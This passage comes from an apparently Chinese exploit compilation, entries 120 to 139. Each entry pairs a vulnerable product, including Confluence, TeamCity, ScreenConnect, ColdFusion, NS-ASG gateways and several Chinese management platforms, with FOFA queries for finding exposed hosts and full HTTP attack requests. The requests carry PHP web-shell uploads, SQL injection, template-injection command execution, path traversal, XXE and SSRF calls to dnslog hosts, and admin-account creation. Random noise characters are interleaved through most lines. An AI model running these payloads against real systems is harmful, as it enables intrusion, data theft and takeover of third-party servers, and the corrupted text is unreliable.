' o" N/ p2 N7 I( F6 g' k1 k3 G2 {0 pConnection: close+ H! k+ m" X2 y! O
$ p! j* H1 I8 R% B6 k1 z( Q, L& psrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234569 |" M" C* T: H' a: l4 \" o
% [. S! \2 K' l0 C( R' Z R5 l9 f( b9 u6 m8 Y2 M; w) R
120. 北京百绰智能S40管理平台导入web.php任意文件上传: U- @6 [. N* I' E) q
CVE-2024-12531 Q1 k. O: h5 P+ q4 U7 n
FOFA:title="Smart管理平台"! i& b. Q7 H3 M; N3 R$ y
POST /useratte/web.php? HTTP/1.1 l2 X5 X8 _; k/ a) H1 h
Host: ip:port
+ |% ]; z6 |; Y9 u5 V( d; v% VCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db) L: S3 ?0 g: i. `
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
3 ?* {- ^- J, I3 G: W' LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 R% X# p) i' P' [+ s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 V6 g6 v0 [* T' k( B% r5 n
Accept-Encoding: gzip, deflate
8 M, ]+ _; L6 X8 K" J# o0 S5 SContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328/ [( @& f9 p8 G) s0 j6 C& w2 U
Content-Length: 597- P; k9 C& }, x1 e% p
Origin: https://ip:port
. p f6 M& L! R- RReferer: https://ip:port/sysmanage/licence.php9 }5 f% H4 P8 F
Upgrade-Insecure-Requests: 1+ g& S: ~( b( R
Sec-Fetch-Dest: document4 v* L. i0 ?0 N5 }5 z) R1 r
Sec-Fetch-Mode: navigate1 n# P) _4 |- D( X# Y
Sec-Fetch-Site: same-origin
7 c b: L5 t# ~$ _* qSec-Fetch-User: ?1
0 r4 j9 y6 c2 J, C& j, QTe: trailers1 y: f) T" Y# c1 N" |
Connection: close
5 \( c/ _8 p# r z; D
! N1 Z/ O) A( B7 U' N) s-----------------------------42328904123665875270630079328; q0 F1 i) h9 u+ {$ W( `
Content-Disposition: form-data; name="file_upload"; filename="2.php"6 D/ q, D+ @- u2 `1 E# _
Content-Type: application/octet-stream
: @* u, S4 u g5 G2 {# M H" o2 Z; B( O& o3 s
<?php phpinfo()?>( u* `" b* M9 ^: `
-----------------------------42328904123665875270630079328
! W3 e; }/ f) N% {Content-Disposition: form-data; name="id_type"
6 x( u" E+ j8 e) i/ C4 l
0 l5 R* l* R1 }$ q. o. c, u1" j% ]- r0 E. `3 j
-----------------------------42328904123665875270630079328
' q! y, }. v& ]$ N0 w5 UContent-Disposition: form-data; name="1_ck", s, B5 D% Z2 E
+ d4 H% i. k/ z! L* N! V$ C2 X% M
1_radhttp
Q! {$ E6 A+ J" G1 Z/ _7 l! C-----------------------------42328904123665875270630079328
1 v. l$ W k, U& o0 b. _Content-Disposition: form-data; name="mode"
$ K# C' i% P6 Y- T/ h+ {9 B+ A" q: c4 s* F% ?* X$ E: `' {& B
import0 U6 \! r' `; q: \' v* g
-----------------------------42328904123665875270630079328
1 E3 L* {; r4 B. c, @8 G9 B3 Q! k" l( `7 n& o8 d- o
3 j" x' R2 n% [: t4 f D4 {6 Y
文件路径/upload/2.php V# I {. h* x$ D/ m7 B
6 ^$ g5 K' s3 T y* g+ f. t
121. 北京百绰智能S42管理平台userattestation.php任意文件上传. W9 d) T: j9 x
CVE-2024-19184 u) J* M5 a M0 G
FOFA:title="Smart管理平台"+ _5 l; t* x& e, `& M. _, w, D
POST /useratte/userattestation.php HTTP/1.1: h* _' m; B5 q" ]* V
Host: 192.168.40.130:8443
. \' I, i* N1 iCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50& u r/ n0 A2 X' C
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko/ v1 A5 p9 ^: R. N. j/ u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 O2 k5 f7 g; e; e* mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 e; |8 r/ x" e9 G: d& n+ B5 F; V9 ]Accept-Encoding: gzip, deflate6 P3 o, J! T# h9 J
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
& o8 J. d( Z' G5 H3 ]Content-Length: 592
$ ]. [& Z& e% U$ R2 r) a) v& wOrigin: https://192.168.40.130:84431 R* g; D8 l) W9 ~# f; F5 M
Upgrade-Insecure-Requests: 17 f" X. H& n# s1 b7 C0 ?! Z
Sec-Fetch-Dest: document
' V9 {+ u, u2 E' U' XSec-Fetch-Mode: navigate1 \( D/ x& H% ]5 [
Sec-Fetch-Site: same-origin; u) g8 P, K) r8 r/ r
Sec-Fetch-User: ?1
! [0 b' |, `+ d1 d) D: f# }. jTe: trailers' d- @9 R, v" g: P
Connection: close% J: e5 w8 `3 [% r) D% O
3 f4 z' }- B1 s
-----------------------------42328904123665875270630079328; `% s2 K0 e3 [: S6 {& _- c) Y2 k
Content-Disposition: form-data; name="web_img"; filename="1.php"& D8 D- Y) Q+ s$ r- E* ?5 J
Content-Type: application/octet-stream
' R p& f8 d0 q! v o7 `. N% e( ]/ S8 a+ |9 k( \+ m+ y, b1 A+ r# P! T
<?php phpinfo();?>3 D, N2 i0 i4 C ?7 z
-----------------------------42328904123665875270630079328" e; m6 ^8 [# A* o$ M2 r
Content-Disposition: form-data; name="id_type"% q- _+ D, V& n* l% K) S, U0 ^
' J. P3 a* G9 Y5 u9 X12 _6 u7 C4 `" O5 P, V @& H
-----------------------------42328904123665875270630079328
# u- _2 {1 J' D9 V8 i- r( nContent-Disposition: form-data; name="1_ck" t' l3 y) ~; J" I2 \+ \& p
: q1 o v- }" W3 h6 F: Z, Y) K, K1_radhttp7 O: e7 u. U) R
-----------------------------423289041236658752706300793280 i1 Y* J8 O9 {/ x9 a5 N& p
Content-Disposition: form-data; name="hidwel"
( }& i, ^* S- d1 u8 M6 G! i J, q( u' h- I. W a
set
# P1 w' U9 a2 {. G- N-----------------------------42328904123665875270630079328
# m3 O2 Z5 S. z
8 w: f( A% U! S6 H% E3 t7 k. O D' h5 k5 w
( ?# x5 r* b& Jboot/web/upload/weblogo/1.php
* v# q5 A* C, Y C7 j) k, o8 @+ T& R( k# U" c4 p+ m
122. 北京百绰智能s200管理平台/importexport.php sql注入' o' ^0 J7 a' ?' i/ t" H
CVE-2024-27718FOFA:title="Smart管理平台"
+ n: J8 j' B( P! Q0 s2 i1 ]其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()2 }$ X4 r& g3 d e" ]0 k [/ w
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
5 s; P1 T! G- j& XHost: x.x.x.x% Z7 A% `% x9 C5 m ^9 B$ s) ^
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
6 h. i2 J0 L6 l7 k/ G- s' iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0& m7 s- q; v ?/ K J0 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! \- N$ c' f6 `# F& i3 N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; `7 R- k0 ^0 W
Accept-Encoding: gzip, deflate, br
^% @& v% l( v$ xUpgrade-Insecure-Requests: 15 M# R: ]2 \5 H F( ~# s
Sec-Fetch-Dest: document1 Y% K, v' M& f" f' ^+ U' Z
Sec-Fetch-Mode: navigate) j9 X4 ?: A1 m% n( Y
Sec-Fetch-Site: none
" V' M* C. f2 F" W3 S6 ^Sec-Fetch-User: ?1
7 Y! v* T. H% h2 ` W8 q0 ~6 ^0 }Te: trailers
& y) {% x1 E" t: ]! FConnection: close
) p1 f0 Y4 C/ F i: }2 j9 |/ j8 e1 h3 g7 C" K# y# w3 \4 D
# @1 }) p7 S0 K# ~/ g
123. Atlassian Confluence 模板注入代码执行" q( M6 E( D# e$ T8 C
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
$ h% z2 _: X2 ^POST /template/aui/text-inline.vm HTTP/1.1
: l4 v* A/ M: O! l) k4 DHost: localhost:8090# O+ Q: v+ V3 i g8 F
Accept-Encoding: gzip, deflate, br5 v( e- |/ l9 ^# H* i S
Accept: */*, D t/ j" c0 e I; J
Accept-Language: en-US;q=0.9,en;q=0.8
" h$ e7 o* K0 S8 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
* W' [" M6 _% C6 H6 h9 V* SConnection: close; f) N/ u2 |' J) J! D+ N+ r$ J
Content-Type: application/x-www-form-urlencoded* B" \, t$ N! o0 P6 a% H
* p$ b/ P/ i/ F+ m
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))9 N; j5 ^3 d4 n4 Y
2 q5 X; G# L7 q1 T+ A; _
* S5 K& K$ K# q( D124. 湖南建研工程质量检测系统任意文件上传
9 l$ F% t8 h) G* c# d6 f+ LFOFA:body="/Content/Theme/Standard/webSite/login.css"
8 G J- O" ^$ [% LPOST /Scripts/admintool?type=updatefile HTTP/1.1
$ G! T$ U: a1 {$ z9 I$ cHost: 192.168.40.130:8282
2 _+ t5 N9 j R* t' v/ tUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36% X! j- x+ _0 R4 K( ?1 U& |
Content-Length: 72$ g: L, Z$ @; ]' d& }& ]. q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8# D% I$ l" y* k+ f1 Y, Y; f* @/ M
Accept-Encoding: gzip, deflate, br
) u5 O8 ~' u5 wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# T8 k/ E/ K0 b
Connection: close
8 _& P1 F: ?+ o0 o0 XContent-Type: application/x-www-form-urlencoded6 W% n+ t& P5 y* `- _
$ e1 D2 ^8 [- }# E
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
' c5 `6 ~' X1 Z; `4 t4 [- R+ K% v, @7 W7 A; Y. `
- }; e1 P1 t8 C0 D4 D. ^http://192.168.40.130:8282/Scripts/abcgcg.aspx" o+ }" }) d% ~8 |! v9 a( m
; I) u0 Y$ P- O, V2 v6 [. O3 u( g
125. ConnectWise ScreenConnect身份验证绕过& r, b& [' t( w% c3 f3 ]3 T4 M% `
CVE-2024-1709( ^8 |* R9 y) o6 A' n1 e) e
FOFA:icon_hash="-82958153". j& a* h2 X& `) b
https://github.com/watchtowrlabs ... bypass-add-user-poc- J9 c: q6 p( c, @) u R
% W4 v3 z% S+ {
/ l4 a5 Y: o# B( ?5 j& m0 k: }使用方法9 l; i# q: \2 k1 V' ~) w
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
- g3 X) Y1 g' e; m$ p! _* o" [+ l4 j( s+ Q
9 }) I9 {& P- U" }创建好用户后直接登录后台,可以执行系统命令。
, H: D) n" A7 R/ J& v: f5 |
+ \, X$ M0 L) Z7 k126. Aiohttp 路径遍历( V8 u8 S7 m4 T5 h3 U% |* Q
FOFA:title=="ComfyUI"
R$ r) ]- ]6 a6 A5 I! qGET /static/../../../../../etc/passwd HTTP/1.1
' q* k2 M# L8 s$ O2 v; D! u0 N5 ~Host: x.x.x.x' d/ `* B ]6 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36$ P* w5 m- S# F! r/ A; \
Connection: close# P n7 \2 O! }( I: S$ S: _
Accept: */*
: U2 W: ~5 H) b0 F% r$ rAccept-Language: en
" Y' e, |+ F6 rAccept-Encoding: gzip0 m; X9 ~5 m2 o# I
6 R6 I$ ~/ j! d; g9 L
' n" t) W+ f: y# y) q% H3 |# F127. 广联达Linkworks DataExchange.ashx XXE
0 V4 {0 [; }& f* ]) w9 d9 {( E$ FFOFA:body="Services/Identification/login.ashx"
# e# F3 _! S. q) y- L4 bPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
, m; Q {' B) l8 gHost: 192.168.40.130:8888
: s ]& R( e TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
5 n2 k8 \7 U% @' s5 jContent-Length: 415
8 |6 k! n. b2 G5 J( K i1 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 e! z9 F1 ]9 G6 H* O1 C
Accept-Encoding: gzip, deflate8 o" [: @1 z+ b+ i1 w
Accept-Language: zh-CN,zh;q=0.9
+ D2 \! m! ^% |" W5 H& ZConnection: close" ~' I' ?% e; B7 ] {5 h3 F
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
; N% K$ V0 P _+ }Purpose: prefetch. d+ G. v) ?( @7 G. L$ \
Sec-Purpose: prefetch;prerender: c. c* R! i. U$ H5 I
. M, \. N* e: z; U# G; @
------WebKitFormBoundaryJGgV5l5ta05yAIe0
- I3 N8 D" P+ D7 R& c7 {Content-Disposition: form-data;name="SystemName"4 U M. ?% Y% W' F0 ^8 S# x5 v
/ q9 N. @( F3 i T/ e2 E7 f- C9 E# qBIM
( N+ v; M9 q) w5 M------WebKitFormBoundaryJGgV5l5ta05yAIe03 Y$ A: l" d+ m4 {7 i) a. ^5 ]
Content-Disposition: form-data;name="Params": h( \! t2 L, _. i" [
Content-Type: text/plain' C1 g7 t# X& }/ [. \8 ^
$ i) O( O F4 o T' K8 k- O
<?xml version="1.0" encoding="UTF-8"?>; a8 c5 k7 w% s* ]7 T
<!DOCTYPE test [9 {- o4 p2 \: ?
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
& G9 j2 c; O$ l]
U C E# @( V$ D/ j/ J8 ]$ g8 E; b) n>
. _; r2 T6 w* b# Z2 ]<test>&t;</test>3 O: x7 ]# Q; `3 ~" U
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
1 y( b$ k7 h1 w" r
/ }; R+ [: \4 H3 I6 Y% R
8 }% }5 [* P: i
+ I/ X5 y) {; K. `' y& L2 w128. Adobe ColdFusion 反序列化
; h( H9 J9 h9 `* B9 ACVE-2023-38203
7 l* F# U- {+ A. I+ OAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
! K' K. h1 o5 {9 O% ~2 b! c- sFOFA:app="Adobe-ColdFusion"
- Z& M6 K* S7 Y* k3 t5 k4 ~PAYLOAD
9 e5 p) B/ h5 a/ f
, u& k! t' { t2 y$ W129. Adobe ColdFusion 任意文件读取
2 W: v5 P" E0 @( w0 l$ w+ ^+ zCVE-2024-20767, H( U7 U9 w+ o+ O) ^ ~8 E9 Y
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request" p3 F8 d8 g! ], v! n
第一步,获取uuid
3 @7 \( W# n& pGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.13 Q0 ^$ y3 K: c6 V
Host: x.x.x.x& K7 b9 y$ ?5 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 o; d# G, Q3 r9 N8 |% tAccept: */*5 I, R) O4 l: u; a3 q
Accept-Encoding: gzip, deflate
! h7 K# h5 u8 d" j8 m. ZConnection: close
* J# @" D# |0 g8 D- p+ y/ \, m0 ^& m3 y
y. P$ `( Y6 c3 D% `3 b7 I/ r第二步,读取/etc/passwd文件* y2 B0 ?0 ~0 j, `: ]
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
) S5 L8 e, Y5 j" M3 _# LHost: x.x.x.x! ~' S _) P- `) w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.369 k" `0 ~ T- K9 z q& A
Accept: */*( C: \) O& c& {2 y
Accept-Encoding: gzip, deflate) z4 C* ~1 R$ |; P7 ?/ S4 d
Connection: close- Q1 u U3 q9 A1 M0 w
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
; j& A5 i) u+ C
$ U( w8 e4 _# _3 I- z
- a9 N0 n* h) u: k [8 J2 y2 D130. Laykefu客服系统任意文件上传, C7 k3 ~6 N0 E2 z$ A) Z
FOFA:icon_hash="-334624619"
! }7 w" a9 n9 ]* P" EPOST /admin/users/upavatar.html HTTP/1.1# U: k* @$ X7 F2 {
Host: 127.0.0.1
3 G; F) b$ S. L% L( PAccept: application/json, text/javascript, */*; q=0.01
0 L3 ~) D) ]: L$ U, b7 SX-Requested-With: XMLHttpRequest, A, _# `2 C( `( o$ {$ _
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
5 \( D6 l. d* P" F, y, w8 p/ ?: zContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR: o* l- }; j' B* b$ R
Accept-Encoding: gzip, deflate* [4 t9 t' a/ _( q( q
Accept-Language: zh-CN,zh;q=0.9
4 k: w- C; J6 L! V5 TCookie: user_name=1; user_id=3/ M4 }& U' l _1 A7 f/ n* q, @0 F
Connection: close* Z* |: b* M9 H2 x" w' X$ J& A
& x* V+ p0 W( E- @% m
------WebKitFormBoundary3OCVBiwBVsNuB2kR
3 N1 d" m) s7 {Content-Disposition: form-data; name="file"; filename="1.php"
, e6 b1 h( q; g& v. Y+ XContent-Type: image/png$ _; E7 F6 `1 t
7 g# N3 [. ~9 E1 n( e<?php phpinfo();@eval($_POST['sec']);?>: I1 F5 c, i; O3 n! @( r; f
------WebKitFormBoundary3OCVBiwBVsNuB2kR--1 d, I3 L2 Q& }) n
& j) @( O- j& D' F0 n
B d8 c s# N @) Y& ~; X! W131. Mini-Tmall <=20231017 SQL注入6 j+ |) B r0 ?7 Y& I u' d- |
FOFA:icon_hash="-2087517259"1 `$ V8 m& L; K) ]* m# w
后台地址:http://localhost:8080/tmall/admin
6 m7 Y" X! H% [& l+ C4 w* thttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
K. X# f+ Q5 u+ Y+ B* x
+ S) J$ N( \( R132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过% o( U; X: t6 c$ ?. z9 Y" A3 R1 a
CVE-2024-27198
5 O4 K8 P, O4 z+ q. O5 f0 BFOFA:body="Log in to TeamCity"
0 m a* ]5 m3 ]2 r8 ?- OPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1. `3 H8 R1 W" I9 T- s# \
Host: 192.168.40.130:8111
' \6 F, ^& \9 k5 O( W% yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" Y( K: `" k: K0 ?) E8 |5 `
Accept: */*9 X$ H- L# { \; M
Content-Type: application/json$ c/ B: j$ ?2 N/ x8 F E; D; b
Accept-Encoding: gzip, deflate
# K ~* G9 `7 X2 s2 }( [# U. `6 n
9 h7 v: `, U: ~% f% f3 b$ y{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
. G. S8 O- w' [$ S/ F& C% P: z4 Z- _2 ~" ~- i% ~* z5 D
1 f) V8 ^3 C8 S. O0 N) ICVE-2024-27199' z& \0 Z O) D; V$ Y) q
/res/../admin/diagnostic.jsp6 }% m6 G2 l$ s6 j4 f+ c
/.well-known/acme-challenge/../../admin/diagnostic.jsp
$ s: B: S- ~8 H7 T: x/update/../admin/diagnostic.jsp
, T, j& G# m! Z% E9 k# F/ E1 l1 j& @5 A% D
L: {& S: I' n# @' ]3 F2 OCVE-2024-27198-RCE.py$ i# `" o8 e4 l9 s# H; b0 u- } u0 Z
- g, f+ t7 n) _0 y
133. H5 云商城 file.php 文件上传) p% Z1 O# v4 H
FOFA:body="/public/qbsp.php"1 S. o( i* v# o+ b2 c6 o3 G% f
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
( s! Y G+ l/ h5 FHost: your-ip6 j: {: b& H5 K I# }# B9 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 H* D1 Q( y O7 M6 n% Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
8 w7 f! l0 q& m2 q( ~8 r' S; R3 v2 E3 ^- F
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
" G5 N) @5 w5 XContent-Disposition: form-data; name="file"; filename="rce.php"$ I6 }. g* i* q
Content-Type: application/octet-stream/ q+ k% q- r) j* @2 W8 @
N+ g$ w* M0 P& H<?php system("cat /etc/passwd");unlink(__FILE__);?>5 J8 t# n: x" y2 Q' j2 s8 D
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--7 H o7 ^% t1 u% d2 t0 H8 A! i$ r, d8 D
3 o# P( L+ m/ |% g# r
* x1 C+ V. p# F- ^* Z+ z/ t
0 Q1 Z2 M% p. ?9 G+ o; C134. 网康NS-ASG应用安全网关index.php sql注入* k9 U4 D# V2 e& l5 a+ z
CVE-2024-2330# n- A6 L0 }) o3 W$ r
Netentsec NS-ASG Application Security Gateway 6.3版本5 g) _/ T# y" K
FOFA:app="网康科技-NS-ASG安全网关"
( n9 G f3 j% c# ]7 a5 @POST /protocol/index.php HTTP/1.17 O, Z9 F7 q) f4 d2 E* d0 R, v
Host: x.x.x.x1 y1 o8 j4 R% J N
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
, p8 d3 V" ~& m8 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
4 W- j9 _: S `9 E, uAccept: */*' w2 b- I4 g5 R# _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 d- U1 [0 {( J# X! W
Accept-Encoding: gzip, deflate
$ E J1 }9 f1 [' iSec-Fetch-Dest: empty
( ]1 D2 Y4 x+ ySec-Fetch-Mode: cors
0 ~2 _- c, S3 Y7 s3 Q; {Sec-Fetch-Site: same-origin
9 ~1 I2 T% D: F/ h4 r5 ZTe: trailers
3 v, _. ^9 A! [* O$ s. @ SConnection: close* U% [$ p$ Z8 i6 R" b
Content-Type: application/x-www-form-urlencoded
" b2 I/ r' F1 \& MContent-Length: 2632 p8 p) A4 Q$ s0 o0 p$ \7 J
) \! ^2 f7 k) H' X6 r; Tjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}, K1 a% v% e9 b6 ?
( N% }3 Y. g# K0 x- h/ @7 @7 ~$ r; a1 B: o
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入2 r6 j" |' b# t x
CVE-2024-2022& a/ p3 z( W# |5 N+ @1 @ Z3 C
Netentsec NS-ASG Application Security Gateway 6.3版本' \) Y6 F1 h) T
FOFA:app="网康科技-NS-ASG安全网关"
; v: f. u+ c+ h7 o$ d% h+ r% g; x! ^GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
, m: W# F% t7 l! x" i8 N- pHost: x.x.x.x
, L# b- l7 x8 ~! ~9 X0 y2 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 g7 @' B" N5 R7 X( [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 t7 _6 V+ R% eAccept-Encoding: gzip, deflate
0 A6 }3 R& L6 M( S# K6 e& K+ VAccept-Language: zh-CN,zh;q=0.9
/ J5 T) y3 e0 i' w. oConnection: close
\! C1 ]/ H, r+ k4 z% _& z' Q- p9 w$ Q- t6 S+ `
; \" J3 e8 o! B$ }, e
136. NextChat cors SSRF
' D U0 J8 |- s" L1 QCVE-2023-49785
! j8 t) Z! U6 c. e& r7 }- VFOFA:title="NextChat"
7 U5 r, j3 \3 J7 U4 P/ B; }4 zGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
( z$ @3 u/ F+ C% EHost: x.x.x.x:10000
8 U- P3 F) t; F" L$ r+ SUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 s5 [1 {- O% I
Connection: close: z+ D2 h! [! w" k) u: M- z
Accept: */*
# _! ^/ U4 M: P q) U* W2 m3 oAccept-Language: en) [7 N1 a& f+ ?5 V% a& C
Accept-Encoding: gzip' j: |3 O# v& q0 G0 F4 U# q7 G9 J% U
: Z! c1 R0 e( F5 W; E
( N2 t; x2 g/ Z. v
137. 福建科立迅通信指挥调度平台down_file.php sql注入( C( o3 @. f0 T* `- e* W+ l: G
CVE-2024-26209 g# R/ J) b8 N6 ^& v- n0 a
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
( j% A( W1 w) c" G) D( M9 sGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.17 P& ?8 |4 M/ P+ \6 I4 t
Host: x.x.x.x* K& w6 X! j& k" u. L! l2 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 C, a4 W$ f s! G& b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# S6 K. K- N/ J2 B5 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 j2 [+ y3 Y3 tAccept-Encoding: gzip, deflate, br; X5 i( D# E# k8 Y8 W/ D7 L+ o
Connection: close
/ V9 q" q) K( p7 ?Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
8 Q9 U1 U( g' X0 L$ A+ R [& CUpgrade-Insecure-Requests: 1
7 F! h3 l3 e/ U1 S9 a
3 [1 ~. S" v& M h- s* [8 Z5 B( ~4 g5 O% U3 n( u. u1 P$ Y
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
/ H; N2 ?) L, G, ~% j" n2 BCVE-2024-2621
6 v0 o, M7 f9 R8 ~5 V+ EFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"+ A7 R: t4 y+ _' y3 _/ R
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.16 z* i9 V# P3 d, m
Host: x.x.x.x
5 u8 e5 r: g1 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 i: K" A; g" i8 T9 C. `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 y0 W2 @3 `3 t- ~4 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 N3 B }% F& o5 ^8 Z
Accept-Encoding: gzip, deflate, br
* h; l& w( O3 z( a. p6 s; VConnection: close$ r, i6 e0 [ i. o, K1 q/ f2 @
Upgrade-Insecure-Requests: 14 \; h9 j( N$ m2 N4 o
/ D" ^: Z2 h5 _' W$ W- ?' C; x0 p
% h$ A: ?* m. L$ b, `' ]; C
139. 福建科立讯通信指挥调度平台editemedia.php sql注入/ e) X9 ?0 H1 d, i# M
CVE-2024-26225 j# i, |( Z9 C1 ^8 d
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
